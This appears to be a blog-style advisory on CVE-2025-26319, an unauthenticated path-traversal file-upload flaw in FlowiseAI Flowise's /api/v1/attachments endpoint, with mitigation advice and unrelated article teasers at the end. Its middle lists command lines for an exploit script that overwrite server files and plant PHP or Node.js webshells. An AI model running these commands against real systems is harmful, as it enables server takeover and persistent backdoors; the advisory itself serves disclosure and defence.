CVE-2025-26319 is a critical vulnerability affecting FlowiseAI Flowise versions up to and including 2.2.6.
This vulnerability allows attackers to perform arbitrary file uploads, potentially leading to remote code execution, server compromise, and unauthorized access to sensitive data.
/api/v1/attachments endpoint, which lacks proper validation of user-supplied parameters.flowise_exploit.pypython flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txtpython flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.jsonpython flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.phppython flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.jsThe attack exploits the /api/v1/attachments route, which is accessible without authentication. By manipulating the chatId parameter, attackers can perform path traversal (../../../) to upload arbitrary files to any location on the server’s file system.
To mitigate this vulnerability, users should upgrade FlowiseAI Flowise to version 2.2.7 or later.
Additional measures include restricting file uploads, implementing strict file type and size filtering, using allowlists for permitted file extensions, and configuring web application firewall (WAF) rules.
Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…
Image credit:pexels.com If you think back to the early days of personal computing, you probably…
In an era defined by technological innovation, the way people handle and understand money has…
The online world becomes more visually driven with every passing year. Images spread across websites,…
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…